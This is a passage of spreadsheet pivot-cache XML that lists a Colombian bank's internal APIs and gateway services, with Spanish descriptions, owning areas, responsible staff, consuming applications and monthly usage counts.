    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="2561"/>
    <n v="2807"/>
    <n v="2490"/>
    <n v="2504"/>
    <n v="2944"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Items"/>
    <n v="113"/>
    <x v="292"/>
    <s v="Esta API permite consultar la información de los productos que son ofrecidos atraves del market place de Bancolombia. Permitiendo consultar listas de productos, un producto en especí­fico, los productos mas visitas o los productos favoritos por clientes."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="390710"/>
    <n v="399448"/>
    <n v="330422"/>
    <n v="413011"/>
    <n v="370392"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Orders"/>
    <n v="110"/>
    <x v="293"/>
    <s v="Esta API permite consultar la información de las órdenes generadas por los clientes a través del market place de Bancolombia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="164"/>
    <n v="215"/>
    <n v="120"/>
    <n v="172"/>
    <n v="195"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Schedule"/>
    <n v="110"/>
    <x v="294"/>
    <s v="Esta API permite gestionar la agenda de un cliente en el market place, donde podrá consultar sus agendas, reagendar una cita o cancelar una cita."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="652"/>
    <n v="861"/>
    <n v="480"/>
    <n v="676"/>
    <n v="765"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-12T15:51:00"/>
    <s v="Loans Sufi Catalogs"/>
    <n v="100"/>
    <s v="Master Reference"/>
    <n v="100"/>
    <x v="295"/>
    <s v="Esta API tiene capacidades que permiten la consulta de los catálogos maestros de referencia dentro del contexto de las solicitudes de crédito de Sufi, que se exponen para diferentes funcionalidades que serán expuestas a los clientes y así­ para facilitar el registro de información y consumo de otras capacidades que requieren estos datos referencia."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003"/>
    <n v="1833275"/>
    <n v="1434873"/>
    <n v="1173941"/>
    <n v="1477751"/>
    <n v="2297368"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-26T17:24:04"/>
    <s v="Merchandising Loan"/>
    <n v="100"/>
    <s v="Merchandising Loan - Financial Renting"/>
    <n v="100"/>
    <x v="296"/>
    <s v="Esta API permite identificar informacion sobre un cliente con base en el arrendamiento por el uso de un producto y/o servicio"/>
    <m/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="1"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificacion De Cupo Tarjetas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Modificación de Cupo permite aumentar o disminuir el cupo (límite) de una tarjeta de crédito mediante el número de tarjeta, el cupo actual y el cupo nuevo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificar Participante"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permite modificar información de participantes en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611002 _x000d__x000a_AW0611001 _x000d__x000a_AW0795"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificar Participante"/>
    <n v="500"/>
    <x v="0"/>
    <s v="Permite modificar información de participantes en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Monitoreo Riesgo Transaccional"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio evalúa el riesgo de una transacción en modo síncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos)  genera de acuerdo al perfil transaccional del cliente. _x000a__x000a_Todo el proceso de enviar la petición desde el consumidor, que pase por integración, complementar la información necesaria, entregar a la herramienta de monitoreo SAS Fraud Management, y responder al consumidor con una recomendación sobre la decisión de la transacción se debe realizar en menos de 500 milisegundos. Es el consumidor el que debe aplicar la acción bajo la recomendación del motor (ejemplo: declinar una transacción)."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="SVP _x000d__x000a_APP _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-03T22:13:55"/>
    <s v="Mortgage"/>
    <n v="212"/>
    <s v="Mortgage Loan - Balances"/>
    <n v="302"/>
    <x v="297"/>
    <s v="La API permitirá a los consumidores consultar el saldo de los proyectos que están asociados a un constructor en particular, el servicio retornara campos como nombre del proyecto, titular, saldos intereses trimestrales etc."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <s v="ConsultarCreditoHipotecario/V2.0_x000a_ConsultarCreditoHipotecario/V3.0"/>
    <m/>
    <s v="PortalConstructorAW0360004_SVE _x000d__x000a_ PortalConstructorAW0360004_SVE _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ MONITOREO_AW1010001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="9816"/>
    <n v="7608"/>
    <n v="7674"/>
    <n v="7380"/>
    <n v="8297"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-11T23:10:16"/>
    <s v="Mortgage Loan Behavioral"/>
    <n v="110"/>
    <s v="Mortgage Loan Behavioral - Mortgage Loan Study"/>
    <n v="110"/>
    <x v="298"/>
    <s v="El API Mortgage Loan Behavioral - Mortgage Loan Study: permite disponer el resultado del estudio de crédito de Hipotecario de formas más ágil, entregando de manera inmediata la respuesta de un cupo para clientes actuales y nuevos, de acuerdo con las polí­ticas de riesgos."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="RespuestaFrenteHipo_AW0856 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="1688"/>
    <n v="3427"/>
    <n v="7298"/>
    <n v="12173"/>
    <n v="16341"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-11T09:31:31"/>
    <s v="Mortgage Loan Payments"/>
    <n v="100"/>
    <s v="Mortgage Loan Payments- Constructor"/>
    <n v="100"/>
    <x v="299"/>
    <s v="Esta API expone el metodo de PagoCreditoHipotecarioConstructor que permite tanto el pago como el reverso de créditos hipotecarios de corto plazo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_ALM"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_APM_TLS_ADAPTER"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="OMAPM_SUFI_AW1097001"/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_AllFunds_AF"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_CADENA_CA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_restjson"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CIB_RemesasMoneyGram_RMG"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_EnvioCorreoElectronicoTODO1_ECT"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_GAF_Marcaciones"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_CONSULTARCLIENTEPREFERENCIALFNAL_CCPFN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GestionAutenticacionOAuth_v2_GAO"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GESTIONGARANTIASFONDONACIONAL_GGFN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="BankVision - BKE_Garantias_ISBKS0003"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GIROS_JSON_MULTICANAL"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GOOGLE_RECAPTCHA_VERIFY"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_ADMINFO"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_ADMINFO_JSON"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_DOMINA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_METRO"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_PIS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_PS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_THOMASEXPRESS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_TODO1"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_INALAMBRIA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_InformeDiarioDIAN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionClienteDIAN"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionMinHacienda_AMH"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticacionOauth"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_AutenticarCompraVCAS"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_CONSUINFOFISCYPARAFISCALCLI_CIFYPFDC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultaFuentesPrivadasExternas_CFPE"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultaProductosInvestBot_CPI"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ConsultarToken_CTRA"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ContribucionDocumental_CD"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DigitalizacionTarjetasMDES"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DigitalSignature_API"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_DocumentDigitalization_API"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ApoyoCorporativo"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_EnvioCorreoElectronico_ECE"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_ENVIOMENSAJERIAMOVIL"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_EnvioSMSRedeban_ESR"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionFraudeCrediticio_GFC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GESTIONLLAVECIFRADO_GLC"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="APIC_x000a_CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IC_GestionPuntosColombia_GPC"/>
    <m/>
    <x v="300"/>
